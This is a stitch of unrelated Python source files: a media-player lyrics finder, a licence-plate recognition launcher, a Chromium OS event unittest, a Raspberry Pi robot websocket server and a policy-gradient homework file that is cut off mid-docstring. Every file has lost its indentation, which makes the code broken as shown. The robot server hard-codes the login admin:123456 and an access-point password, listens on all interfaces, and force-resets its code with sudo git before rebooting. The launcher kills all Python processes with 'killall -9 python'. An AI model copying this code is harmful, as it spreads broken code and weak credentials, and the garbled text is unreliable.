_ARTIST_TITLE_REXP = re.compile(r"([\w\d.&\\/'` ]*)[-:|~]([\w\d.&\\/'` ]*)", re.UNICODE)
def __init__(self, parent, coords, update_coords_func, track_title):
Toplevel.__init__(self, parent, background="#d9d9d9")
try:
self.geometry(coords)
except:
pass
self.transient(parent)
self.bind('<Configure>', update_coords_func)
self.title(_("Lyrics Finder"))
self.resizable(False,False)
self.lyrics_var = tk.StringVar()
self.lyrics_var.set(_("Trying to grab lyrics from the web..."))
frame = VerticalScrolledFrame(self)
frame.grid()
frame.configure_scrolling()
Label(frame.interior, font=('Comic Sans', 11),
foreground = 'black', wraplength = 378,
textvariable=self.lyrics_var,
background="#d9d9d9").grid(column=0, row=0, columnspan=3, sticky=E+W+N+S)
search_result = self._ARTIST_TITLE_REXP.search(track_title)
if not search_result:
self.nope()
return
title_data = search_result.groups()
artist = title_data[0].strip(' ')
title = title_data[1].strip(' ')
self.get_lyrics(artist, title)
def get_lyrics(self, artist, title):
self._background_thread = Thread(target=self._get_lyrics, args=[artist, title])
self._background_thread.start()
def _get_lyrics(self, artist, title):
try:
api_url = 'http://lyrics.wikia.com/api.php'
api_response = requests.get(api_url, params={
'fmt': 'realjson',
'func': 'getSong',
'artist': artist,
'title': title,
'no_pager': True
}).json()
if not api_response or not 'page_id' in api_response:
raise Exception()
pagesrc = requests.get(api_response['url']).text
parser = LyricWikiParser()
parser.feed(pagesrc)
lyrics = (api_response["artist"] + ": " + api_response["song"] +
"\n -- - -- - -- - -- - -- - -- - -- - -- - -- \n\n" +
parser.result)
self.lyrics_var.set(lyrics)
except:
self.nope()
def nope(self):
self.lyrics_var.set(_("Unable to retrieve lyrics for this track."))
self.after(3000, lambda: self.destroy())
# ***************************************
# MAIN
# ***************************************
if __name__ == "__main__":
datestring="6 Dec 2020"
dbusif_tboplayer = None
try:
bus = dbus.SessionBus()
bus_object = bus.get_object(TBOPLAYER_DBUS_OBJECT, TBOPLAYER_DBUS_PATH, introspect = False)
dbusif_tboplayer = dbus.Interface(bus_object, TBOPLAYER_DBUS_INTERFACE)
except: pass
if dbusif_tboplayer is None:
tk.CallWrapper = ExceptionCatcher
bplayer = TBOPlayer(options)
TBOPlayerDBusInterface(bplayer)
gobject_loop = gobject.MainLoop()
def refresh_player():
try:
bplayer.root.update()
gobject.timeout_add(66, refresh_player)
except:
gobject_loop.quit()
bplayer.shutdown()
def start_gobject():
gobject_loop.run()
gobject.timeout_add(66, refresh_player)
bplayer.root.after(65, start_gobject)
bplayer.root.mainloop()
elif len(sys.argv[1:]) > 0:
dbusif_tboplayer.openFiles(sys.argv[1:])
exit()
|
ANPR_main.py
|
import os
import time

try:
os.system("killall -9 python")
time.sleep(100)
print("old python process killed ")
except:
print("No running python process ")
pass
from ANPR_lp_detection import *
from ANPR_lp_recognition import *
from postprocess_anpr import *
from user_interface import *
import multiprocessing
def main():
print("main start")
Lp_q = multiprocessing.Queue(maxsize = 10)
Vehicle_q = multiprocessing.Queue(maxsize = 10)
NP_Detection = multiprocessing.Process(target= anpr_detection, args=(Lp_q,Vehicle_q,))
NP_Recognition = multiprocessing.Process(target= Lp_recognition, args=(Vehicle_q,Lp_q))
ui_start = multiprocessing.Process(target = img_retrive, args=(Lp_q,))
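# Pipeline (inferred from the queue wiring): anpr_detection and Lp_recognition
# exchange work through Vehicle_q and Lp_q, while img_retrive consumes results
# from Lp_q for display in the user interface.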
NP_Detection.start()
NP_Recognition.start()
ui_start.start()
print("main end")
if __name__ == "__main__":
main()
|
event_unittest.py
|
#!/usr/bin/env python3
# Copyright 2018 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import threading
import time
import unittest
from cros.factory.test import event
from cros.factory.utils import net_utils
from cros.factory.utils import process_utils
EventType = event.Event.Type
PING = 'PING'
PONG = 'PONG'
class EventTest(unittest.TestCase):
def testConvertJSON(self):
event1 = event.Event(EventType.SET_HTML, html='abc')
event1_json = event1.to_json()
event2 = event.Event.from_json(event1_json)
event2_json = event2.to_json()
self.assertEqual(event1, event2)
event1_dict = json.loads(event1_json)
event2_dict = json.loads(event2_json)
self.assertEqual(event1_dict, event2_dict)
# We add an additional layer of class, so the unittest TestCase finder won't
# find the base class EventServerClientTest.
class Tests:
class EventServerClientTestBase(unittest.TestCase):
has_pong_client = True
def setUp(self):
self.server = event.EventServer()
self.server_thread = process_utils.StartDaemonThread(
target=self.server.serve_forever)
self.clients = []
if self.has_pong_client:
self.pong_client = event.ThreadingEventClient(callback=self._Pong)
self.clients.append(self.pong_client)
def CreateClient(self, callback=None):
# pylint: disable=no-member
if callback is None:
callback = lambda unused_event: None
client = self.client_class(callback=callback)
self.clients.append(client)
return client
def _Pong(self, ev):
if ev.type == PING:
self.pong_client.post_event(event.Event(PONG, msg=ev.msg))
def tearDown(self):
for client in self.clients:
client.close()
net_utils.ShutdownTCPServer(self.server)
self.server_thread.join()
self.server.server_close()
# Make sure we're not leaving any extra threads hanging around after a
# second.
extra_threads = [t for t in threading.enumerate()
if t != threading.current_thread()]
end_time = time.time() + 1
for thread in extra_threads:
thread.join(timeout=end_time - time.time())
self.assertFalse(thread.is_alive(),
"Thread %r still alive after 1 second." % thread)
class EventServerClientTest(EventServerClientTestBase):
def testBasic(self):
# pylint: disable=unnecessary-lambda
client_events = []
pong_got = threading.Event()
def _Callback(ev):
client_events.append(ev)
if ev.type == PONG:
pong_got.set()
client = self.CreateClient(_Callback)
ev = event.Event(PING, msg='msg')
pong_msg = client.request_response(ev, lambda ev: ev.type == PONG)
self.assertEqual(PONG, pong_msg.type)
self.assertEqual('msg', pong_msg.msg)
pong_got.wait()
self.assertEqual(client_events, [ev, pong_msg])
def testTimeout(self):
client = self.CreateClient()
self.assertIsNone(client.wait(lambda ev: ev.type == PONG, timeout=0.1))
class EventServerBlockingClientTest(Tests.EventServerClientTest):
client_class = event.BlockingEventClient
class EventServerThreadingClientTest(Tests.EventServerClientTest):
client_class = event.ThreadingEventClient
class EventUtilityFunctionTest(Tests.EventServerClientTestBase):
client_class = event.BlockingEventClient
def testPostEvent(self):
client = self.CreateClient()
event.PostEvent(event.Event(PING, msg='msg'))
pong_msg = client.wait(lambda ev: ev.type == PONG)
self.assertEqual(PONG, pong_msg.type)
self.assertEqual('msg', pong_msg.msg)
def testPostNewEvent(self):
client = self.CreateClient()
event.PostNewEvent(PING, msg='msg')
pong_msg = client.wait(lambda ev: ev.type == PONG)
self.assertEqual(PONG, pong_msg.type)
self.assertEqual('msg', pong_msg.msg)
def testSendEvent(self):
pong_msg = event.SendEvent(
event.Event(PING, msg='msg'), lambda ev: ev.type == PONG)
self.assertEqual(PONG, pong_msg.type)
self.assertEqual('msg', pong_msg.msg)
class EventServerQueueCleanTest(Tests.EventServerClientTestBase):
client_class = event.BlockingEventClient
has_pong_client = False
def testQueueClean(self):
client = self.CreateClient()
for unused_i in range(1000):
client.post_event(event.Event(PING, msg='msg'))
client.post_event(event.Event(PONG, msg='msg'))
client.wait(lambda ev: ev.type == PONG)
# pylint: disable=protected-access
with self.server._lock:
for queue in self.server._queues:
self.assertFalse(queue.qsize())
if __name__ == '__main__':
unittest.main()
|
webServer.py
|
#!/usr/bin/env python
# File name : server.py
# Production : GWR
# Website : www.adeept.com
# Author : William
# Date : 2020/03/17
import time
import threading
import move
import Adafruit_PCA9685
import os
import info
import RPIservo
import functions
import robotLight
import switch
import socket
#websocket
import asyncio
import websockets
import json
import app
from mpu6050 import mpu6050
OLED_connection = 1
try:
import OLED
screen = OLED.OLED_ctrl()
screen.start()
screen.screen_show(1, 'GEWBOT.COM')
except:
OLED_connection = 0
print('OLED disconnected')
pass
try:
sensor = mpu6050(0x68)
print('mpu6050 connected, PT MODE ON')
modeSelect = 'PT'
except:
print('mpu6050 disconnected, ARM MODE ON')
modeSelect = 'ARM'
functionMode = 0
speed_set = 100
rad = 0.5
turnWiggle = 60
scGear = RPIservo.ServoCtrl()
scGear.moveInit()
P_sc = RPIservo.ServoCtrl()
P_sc.start()
C_sc = RPIservo.ServoCtrl()
C_sc.start()
T_sc = RPIservo.ServoCtrl()
T_sc.start()
H_sc = RPIservo.ServoCtrl()
H_sc.start()
G_sc = RPIservo.ServoCtrl()
G_sc.start()
# modeSelect = 'none'
init_pwm = []
for i in range(16):
init_pwm.append(scGear.initPos[i])
fuc = functions.Functions()
fuc.start()
curpath = os.path.realpath(__file__)
thisPath = "/" + os.path.dirname(curpath)
def servoPosInit():
scGear.initConfig(0,init_pwm[0],1)
P_sc.initConfig(1,init_pwm[1],1)
T_sc.initConfig(2,init_pwm[2],1)
H_sc.initConfig(3,init_pwm[3],1)
G_sc.initConfig(4,init_pwm[4],1)
def replace_num(initial,new_num): #Call this function to persist a value by rewriting the matching line in RPIservo.py
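# e.g. replace_num("init_pwm3 = ", 287) rewrites the line starting with
# "init_pwm3 = " in RPIservo.py, so the new value is what RPIservo.py defines the
# next time it is loaded.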
global r
newline=""
str_num=str(new_num)
with open(thisPath+"/RPIservo.py","r") as f:
for line in f.readlines():
if(line.find(initial) == 0):
line = initial+"%s" %(str_num+"\n")
newline += line
with open(thisPath+"/RPIservo.py","w") as f:
f.writelines(newline)
def FPV_thread():
global fpv
fpv=FPV.FPV()
fpv.capture_thread(addr[0])
def ap_thread():
os.system("sudo create_ap wlan0 eth0 Groovy 12345678")
def functionSelect(command_input, response):
global functionMode
if 'scan' == command_input:
if OLED_connection:
screen.screen_show(5,'SCANNING')
if modeSelect == 'PT':
radar_send = fuc.radarScan()
print(radar_send)
response['title'] = 'scanResult'
response['data'] = radar_send
time.sleep(0.3)
elif 'findColor' == command_input:
if OLED_connection:
screen.screen_show(5,'FindColor')
if modeSelect == 'PT':
flask_app.modeselect('findColor')
else:
screen.screen_show(6,'FC ONLY ON PT')
elif 'motionGet' == command_input:
if OLED_connection:
screen.screen_show(5,'MotionGet')
flask_app.modeselect('watchDog')
elif 'stopCV' == command_input:
flask_app.modeselect('none')
switch.switch(1,0)
switch.switch(2,0)
switch.switch(3,0)
elif 'police' == command_input:
if OLED_connection:
screen.screen_show(5,'POLICE')
RL.police()
elif 'policeOff' == command_input:
RL.pause()
move.motorStop()
elif 'automatic' == command_input:
if OLED_connection:
screen.screen_show(5,'Automatic')
if modeSelect == 'PT':
fuc.automatic()
else:
fuc.pause()
elif 'automaticOff' == command_input:
fuc.pause()
move.motorStop()
elif 'trackLine' == command_input:
fuc.trackLine()
if OLED_connection:
screen.screen_show(5,'TrackLine')
elif 'trackLineOff' == command_input:
fuc.pause()
elif 'steadyCamera' == command_input:
if OLED_connection:
screen.screen_show(5,'SteadyCamera')
if modeSelect == 'PT':
fuc.steady(T_sc.lastPos[2])
elif 'steadyCameraOff' == command_input:
fuc.pause()
move.motorStop()
def switchCtrl(command_input, response):
if 'Switch_1_on' in command_input:
switch.switch(1,1)
elif 'Switch_1_off' in command_input:
switch.switch(1,0)
elif 'Switch_2_on' in command_input:
switch.switch(2,1)
elif 'Switch_2_off' in command_input:
switch.switch(2,0)
elif 'Switch_3_on' in command_input:
switch.switch(3,1)
elif 'Switch_3_off' in command_input:
switch.switch(3,0)
def robotCtrl(command_input, response):
global direction_command, turn_command
if 'forward' == command_input:
direction_command = 'forward'
move.move(speed_set, 'forward', 'no', rad)
elif 'backward' == command_input:
direction_command = 'backward'
move.move(speed_set, 'backward', 'no', rad)
elif 'DS' in command_input:
direction_command = 'no'
move.move(speed_set, 'no', 'no', rad)
elif 'left' == command_input:
turn_command = 'left'
move.move(speed_set, 'no', 'left', rad)
elif 'right' == command_input:
turn_command = 'right'
move.move(speed_set, 'no', 'right', rad)
elif 'TS' in command_input:
turn_command = 'no'
if direction_command == 'no':
move.move(speed_set, 'no', 'no', rad)
else:
move.move(speed_set, direction_command, 'no', rad)
elif 'lookleft' == command_input:
P_sc.singleServo(0, 1, 4)
elif 'lookright' == command_input:
P_sc.singleServo(0, -1, 4)
elif 'LRstop' in command_input:
P_sc.stopWiggle()
elif 'up' == command_input:
if modeSelect == 'PT':
C_sc.singleServo(1, -1, 6)
else:
T_sc.singleServo(2, -1, 3)
elif 'down' == command_input:
if modeSelect == 'PT':
C_sc.singleServo(1, 1, 6)
else:
T_sc.singleServo(2, 1, 3)
elif 'armup' == command_input:
# T_sc.singleServo(4, -1, 3)
C_sc.singleServo(1, -1, 6)
elif 'armdown' == command_input:
# T_sc.singleServo(4, 1, 3)
C_sc.singleServo(1, 1, 6)
elif 'armstop' in command_input:
# T_sc.stopWiggle()
C_sc.stopWiggle()
elif 'UDstop' in command_input:
C_sc.stopWiggle()
T_sc.stopWiggle()
elif 'handup' == command_input:
# H_sc.singleServo(2, 1, 3)
C_sc.singleServo(1, -1, 6)
elif 'handdown' == command_input:
# H_sc.singleServo(2, -1, 3)
C_sc.singleServo(1, 1, 6)
elif 'HAstop' in command_input:
# H_sc.stopWiggle()
C_sc.stopWiggle()
elif 'grab' == command_input:
G_sc.singleServo(3, -1, 3)
elif 'loose' == command_input:
G_sc.singleServo(3, 1, 3)
elif 'stop' == command_input:
G_sc.stopWiggle()
elif 'home' == command_input:
P_sc.moveServoInit([0])
C_sc.moveServoInit([4])
T_sc.moveServoInit([1])
H_sc.moveServoInit([2])
G_sc.moveServoInit([3])
def configPWM(command_input, response):
if 'SiLeft' in command_input:
numServo = int(command_input[7:])
init_pwm[numServo] = init_pwm[numServo] - 1
scGear.initConfig(numServo, init_pwm[numServo], 1)
if 'SiRight' in command_input:
numServo = int(command_input[7:])
init_pwm[numServo] = init_pwm[numServo] + 1
scGear.initConfig(numServo, init_pwm[numServo], 1)
if 'PWMMS' in command_input:
numServo = int(command_input[6:])
replace_num("init_pwm%d = "%numServo, init_pwm[numServo])
if 'PWMINIT' == command_input:
for i in range(0,16):
scGear.initConfig(i, init_pwm[i], 1)
if 'PWMD' == command_input:
    for i in range(0,16):
        init_pwm[i] = 300
        replace_num("init_pwm%d = "%i, init_pwm[i])
def update_code():
# Update local to be consistent with remote
projectPath = thisPath[:-7]
with open(f'{projectPath}/config.json', 'r') as f1:
config = json.load(f1)
if not config['production']:
print('Update code')
# Force overwriting local code
if os.system(f'cd {projectPath} && sudo git fetch --all && sudo git reset --hard origin/master && sudo git pull') == 0:
print('Update successfully')
print('Restarting...')
os.system('sudo reboot')
def wifi_check():
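# Probe internet connectivity by "connecting" a UDP socket to 1.1.1.1; on success
# show the local IP and pull code updates, otherwise fall back to starting a
# local access point via create_ap (progress is shown on the OLED and LEDs).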
try:
s =socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
s.connect(("1.1.1.1",80))
ipaddr_check=s.getsockname()[0]
s.close()
print(ipaddr_check)
update_code()
if OLED_connection:
screen.screen_show(2, 'IP:'+ipaddr_check)
screen.screen_show(3, 'AP MODE OFF')
except:
ap_threading=threading.Thread(target=ap_thread) #Define a thread for starting the access point
ap_threading.daemon = True #Daemon thread: it is terminated automatically when the main program exits
ap_threading.start() #Thread starts
if OLED_connection:
screen.screen_show(2, 'AP Starting 10%')
RL.setColor(0,16,50)
time.sleep(1)
if OLED_connection:
screen.screen_show(2, 'AP Starting 30%')
RL.setColor(0,16,100)
time.sleep(1)
if OLED_connection:
screen.screen_show(2, 'AP Starting 50%')
RL.setColor(0,16,150)
time.sleep(1)
if OLED_connection:
screen.screen_show(2, 'AP Starting 70%')
RL.setColor(0,16,200)
time.sleep(1)
if OLED_connection:
screen.screen_show(2, 'AP Starting 90%')
RL.setColor(0,16,255)
time.sleep(1)
if OLED_connection:
screen.screen_show(2, 'AP Starting 100%')
RL.setColor(35,255,35)
if OLED_connection:
screen.screen_show(2, 'IP:192.168.12.1')
screen.screen_show(3, 'AP MODE ON')
async def check_permit(websocket):
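# Simple handshake: the client must send "username:password" (hard-coded below as
# admin:123456); keep prompting until a matching pair is received.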
while True:
recv_str = await websocket.recv()
cred_dict = recv_str.split(":")
if cred_dict[0] == "admin" and cred_dict[1] == "123456":
response_str = "congratulation, you have connect with server\r\nnow, you can do something else"
await websocket.send(response_str)
return True
else:
response_str = "sorry, the username or password is wrong, please submit again"
await websocket.send(response_str)
async def recv_msg(websocket):
global speed_set, modeSelect
move.setup()
direction_command = 'no'
turn_command = 'no'
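# Each websocket frame is either a plain-text command (e.g. 'forward', 'wsB 60',
# 'PT', 'CVFL') or a JSON object such as {"title": "findColorSet", "data": [r, g, b]};
# the handlers below dispatch on the decoded value and reply with a JSON response.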
while True:
response = {
'status' : 'ok',
'title' : '',
'data' : None
}
data = ''
data = await websocket.recv()
try:
data = json.loads(data)
except Exception as e:
print('not A JSON')
if not data:
continue
if isinstance(data,str):
robotCtrl(data, response)
switchCtrl(data, response)
functionSelect(data, response)
configPWM(data, response)
if 'get_info' == data:
response['title'] = 'get_info'
response['data'] = [info.get_cpu_tempfunc(), info.get_cpu_use(), info.get_ram_info()]
if 'wsB' in data:
try:
set_B=data.split()
speed_set = int(set_B[1])
except:
pass
elif 'AR' == data:
modeSelect = 'AR'
if OLED_connection:
    screen.screen_show(4, 'ARM MODE ON')
try:
fpv.changeMode('ARM MODE ON')
except:
pass
elif 'PT' == data:
modeSelect = 'PT'
if OLED_connection:
    screen.screen_show(4, 'PT MODE ON')
try:
fpv.changeMode('PT MODE ON')
except:
pass
#CVFL
elif 'CVFL' == data:
flask_app.modeselect('findlineCV')
elif 'CVFLColorSet' in data:
color = int(data.split()[1])
flask_app.camera.colorSet(color)
elif 'CVFLL1' in data:
pos = int(data.split()[1])
flask_app.camera.linePosSet_1(pos)
elif 'CVFLL2' in data:
pos = int(data.split()[1])
flask_app.camera.linePosSet_2(pos)
elif 'CVFLSP' in data:
err = int(data.split()[1])
flask_app.camera.errorSet(err)
elif 'defEC' in data:#Z
fpv.defaultExpCom()
elif(isinstance(data,dict)):
if data['title'] == "findColorSet":
color = data['data']
flask_app.colorFindSet(color[0],color[1],color[2])
if not functionMode:
if OLED_connection:
screen.screen_show(5,'Functions OFF')
else:
pass
print(data)
response = json.dumps(response)
await websocket.send(response)
async def main_logic(websocket, path):
await check_permit(websocket)
await recv_msg(websocket)
if __name__ == '__main__':
switch.switchSetup()
switch.set_all_switch_off()
HOST = ''
PORT = 10223 #Define port serial
BUFSIZ = 1024 #Define buffer size
ADDR = (HOST, PORT)
global flask_app
flask_app = app.webapp()
flask_app.startthread()
try:
RL=robotLight.RobotLight()
RL.start()
RL.breath(70,70,255)
except:
print('Use "sudo pip3 install rpi_ws281x" to install WS_281x package\n使用"sudo pip3 install rpi_ws281x"命令来安装rpi_ws281x')
pass
while 1:
wifi_check()
try: #Start server,waiting for client
start_server = websockets.serve(main_logic, '0.0.0.0', 8888)
asyncio.get_event_loop().run_until_complete(start_server)
print('waiting for connection...')
# print('...connected from :', addr)
break
except Exception as e:
print(e)
RL.setColor(0,0,0)
try:
RL.setColor(0,80,255)
except:
pass
try:
asyncio.get_event_loop().run_forever()
except Exception as e:
print(e)
RL.setColor(0,0,0)
move.destroy()
|
train_pg_f18.py
|
"""
Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017
Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam
Adapted for CS294-112 Fall 2018 by Michael Chang and Soroush Nasiriany
"""
import numpy as np
import os
os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
import tensorflow as tf
import gym
import logz
import time
import inspect
from multiprocessing import Process
#============================================================================================#
# Utilities
#============================================================================================#
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def build_mlp(input_placeholder, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None):
"""
Builds a feedforward neural network
arguments:
input_placeholder: placeholder variable for the state (batch_size, input_size)
output_size: size of the output layer
scope: variable scope of the network
n_layers: number of hidden layers
size: dimension of the hidden layer
activation: activation of the hidden layers
output_activation: activation of the output layers
returns:
output placeholder of the network (the result of a forward pass)
Hint: use tf.layers.dense
"""
with tf.variable_scope(scope):
input_holder = input_placeholder
for h in range(n_layers):
next_layer = tf.layers.dense(input_holder, size, activation=activation, use_bias=True)
input_holder = next_layer
output_layer = tf.layers.dense(input_holder, output_size, activation=output_activation, use_bias=True)
return output_layer
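# Shape sketch (illustrative, not part of the assignment code): for a CartPole-like
# observation of dimension 4 and 2 actions,
#   logits = build_mlp(tf.placeholder(tf.float32, [None, 4]), 2, "policy", n_layers=2, size=64)
# returns a tensor of shape (None, 2).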
def build_rnn(input_placeholder, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None):
"""
Builds a feedforward neural network (note: despite its name, this mirrors build_mlp and does not construct a recurrent network)
arguments:
input_placeholder: placeholder variable for the state (batch_size, input_size)
output_size: size of the output layer
scope: variable scope of the network
n_layers: number of hidden layers
size: dimension of the hidden layer
activation: activation of the hidden layers
output_activation: activation of the output layers
returns:
output placeholder of the network (the result of a forward pass)
Hint: use tf.layers.dense
"""
with tf.variable_scope(scope):
input_holder = input_placeholder
for h in range(n_layers):
next_layer = tf.layers.dense(input_holder, size, activation=activation, use_bias=True)
input_holder = next_layer
output_layer = tf.layers.dense(input_holder, output_size, activation=output_activation, use_bias=True)
return output_layer
def pathlength(path):
return len(path["reward"])
def setup_logger(logdir, locals_):
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_PG)[0]
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
#============================================================================================#
# Policy Gradient
#============================================================================================#
class Agent(object):
def __init__(self, computation_graph_args, sample_trajectory_args, estimate_return_args):
super(Agent, self).__init__()
self.ob_dim = computation_graph_args['ob_dim']
self.ac_dim = computation_graph_args['ac_dim']
self.discrete = computation_graph_args['discrete']
self.size = computation_graph_args['size']
self.n_layers = computation_graph_args['n_layers']
self.learning_rate = computation_graph_args['learning_rate']
self.animate = sample_trajectory_args['animate']
self.max_path_length = sample_trajectory_args['max_path_length']
self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch']
self.gamma = estimate_return_args['gamma']
self.reward_to_go = estimate_return_args['reward_to_go']
self.nn_baseline = estimate_return_args['nn_baseline']
self.normalize_advantages = estimate_return_args['normalize_advantages']
def init_tf_sess(self):
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
self.sess = tf.Session(config=tf_config)
self.sess.__enter__() # equivalent to `with self.sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def define_placeholders(self):
"""
Placeholders for batch observations / actions / advantages in policy gradient
loss function.
See Agent.build_computation_graph for notation
_no - this tensor should have shape (batch self.size /n/, observation dim)
_na - this tensor should have shape (batch self.size /n/, action dim)
_n - this tensor should have shape (batch self.size /n/)
returns:
sy_ob_no: placeholder for observations
sy_ac_na: placeholder for actions
sy_adv_n: placeholder for advantages
"""
#raise NotImplementedError
sy_ob_no = tf.placeholder(shape=[None, self.ob_dim], name="ob", dtype=tf.float32)
if self.discrete:
sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, self.ac_dim], name="ac", dtype=tf.float32)
# YOUR CODE HERE
sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32)
return sy_ob_no, sy_ac_na, sy_adv_n
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def policy_forward_pass(self, sy_ob_no):
""" Constructs the symbolic operation for the policy network outputs,
which are the parameters of the policy distribution p(a|s)
arguments:
sy_ob_no: (batch_size, self.ob_dim)
returns:
the parameters of the policy.
if discrete, the parameters are the logits of a categorical distribution
over the actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous, the parameters are a tuple (mean, log_std) of a Gaussian
distribution over actions. log_std should just be a trainable
variable, not a network output.
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
Hint: use the 'build_mlp' function to output the logits (in the discrete case)
and the mean (in the continuous case).
Pass in self.n_layers for the 'n_layers' argument, and
pass in self.size for the 'size' argument.
"""
if self.discrete:
# YOUR_CODE_HERE
output = build_mlp(sy_ob_no, self.ac_dim, "", n_layers=self.n_layers, size=self.size)
sy_logits_na = output
return sy_logits_na
else:
# YOUR_CODE_HERE
sy_mean = build_mlp(sy_ob_no, self.ac_dim, "", n_layers=self.n_layers, size=self.size)
sy_logstd = tf.get_variable("log_std", shape=(self.ac_dim,), dtype=tf.float32)
return (sy_mean, sy_logstd)
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def sample_action(self, policy_parameters):
""" Constructs a symbolic operation for stochastically sampling from the policy
distribution
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
returns:
sy_sampled_ac:
if discrete: (batch_size,)
if continuous: (batch_size, self.ac_dim)
Hint: for the continuous case, use the reparameterization trick:
The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
mu + sigma * z, z ~ N(0, I)
This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
"""
if self.discrete:
sy_logits_na = policy_parameters
# YOUR_CODE_HERE
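# NOTE: tf.multinomial returns action indices with shape (batch_size, 1); the clip
# to [0, 1] only makes sense for a two-action environment such as CartPole, and
# sample_trajectory() relies on the extra dimension when it indexes ac[0][0].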
sy_sampled_ac = tf.multinomial(sy_logits_na, 1)
sy_sampled_ac = tf.clip_by_value(sy_sampled_ac, 0, 1)
else:
sy_mean, sy_logstd = policy_parameters
z = tf.random_normal(tf.shape(sy_mean))
# YOUR_CODE_HERE
sy_sampled_ac = sy_mean + tf.exp(sy_logstd) * z
return sy_sampled_ac
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def get_log_prob(self, policy_parameters, sy_ac_na):
""" Constructs a symbolic operation for computing the log probability of a set of actions
that were actually taken according to the policy
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
sy_ac_na:
if discrete: (batch_size,)
if continuous: (batch_size, self.ac_dim)
returns:
sy_logprob_n: (batch_size)
Hint:
For the discrete case, use the log probability under a categorical distribution.
For the continuous case, use the log probability under a multivariate gaussian.
"""
if self.discrete:
sy_logits_na = policy_parameters
# YOUR_CODE_HERE
dist = tf.distributions.Categorical(sy_logits_na)
sy_logprob_n = dist.log_prob(sy_ac_na)
else:
sy_mean, sy_logstd = policy_parameters
dist = tf.contrib.distributions.MultivariateNormalDiag(loc=sy_mean,
    scale_diag=tf.exp(sy_logstd))
#dist = tf.distributions.Normal(loc=sy_mean, scale=tf.exp(sy_logstd))
# YOUR_CODE_HERE
sy_logprob_n = dist.log_prob(sy_ac_na)
return sy_logprob_n
def build_computation_graph(self):
"""
Notes on notation:
Symbolic variables have the prefix sy_, to distinguish them from the numerical values
that are computed later in the function
Prefixes and suffixes:
ob - observation
ac - action
_no - this tensor should have shape (batch self.size /n/, observation dim)
_na - this tensor should have shape (batch self.size /n/, action dim)
_n - this tensor should have shape (batch self.size /n/)
Note: batch self.size /n/ is defined at runtime, and until then, the shape for that axis
is None
----------------------------------------------------------------------------------
loss: a function of self.sy_logprob_n and self.sy_adv_n that we will differentiate
to get the policy gradient.
"""
self.sy_ob_no, self.sy_ac_na, self.sy_adv_n = self.define_placeholders()
# The policy takes in an observation and produces a distribution over the action space
self.policy_parameters = self.policy_forward_pass(self.sy_ob_no)
# We can sample actions from this action distribution.
# This will be called in Agent.sample_trajectory() where we generate a rollout.
self.sy_sampled_ac = self.sample_action(self.policy_parameters)
# We can also compute the logprob of the actions that were actually taken by the policy
# This is used in the loss function.
self.sy_logprob_n = self.get_log_prob(self.policy_parameters, self.sy_ac_na)
#========================================================================================#
# ----------PROBLEM 2----------
# Loss Function and Training Operation
#========================================================================================#
self.loss = -tf.reduce_mean(self.sy_logprob_n*self.sy_adv_n)
self.update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.loss)
#========================================================================================#
# ----------PROBLEM 6----------
# Optional Baseline
#
# Define placeholders for targets, a loss function and an update op for fitting a
# neural network baseline. These will be used to fit the neural network baseline.
#========================================================================================#
if self.nn_baseline:
self.baseline_prediction = tf.squeeze(build_mlp(
self.sy_ob_no,
1,
"nn_baseline",
n_layers=self.n_layers,
size=self.size))
# YOUR_CODE_HERE
self.sy_target_n = self.sy_adv_n
baseline_loss = tf.reduce_mean(tf.squared_difference(self.baseline_prediction, self.sy_target_n))
self.baseline_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(baseline_loss)
def sample_trajectories(self, itr, env):
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and self.animate)
path = self.sample_trajectory(env, animate_this_episode)
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > self.min_timesteps_per_batch:
break
return paths, timesteps_this_batch
def sample_trajectory(self, env, animate_this_episode):
ob = env.reset()
obs, acs, rewards = [], [], []
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.1)
obs.append(ob)
#====================================================================================#
# ----------PROBLEM 3----------
#====================================================================================#
ac = self.sess.run(self.sy_sampled_ac, feed_dict={self.sy_ob_no: [ob]})
ac = ac[0][0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
rewards.append(rew)
steps += 1
if done or steps > self.max_path_length:
break
path = {"observation" : np.array(obs, dtype=np.float32),
"reward" : np.array(rewards, dtype=np.float32),
"action" : np.array(acs, dtype=np.float32)}
return path
#====================================================================================#
# ----------PROBLEM 3----------
#====================================================================================#
def sum_of_rewards(self, re_n):
"""
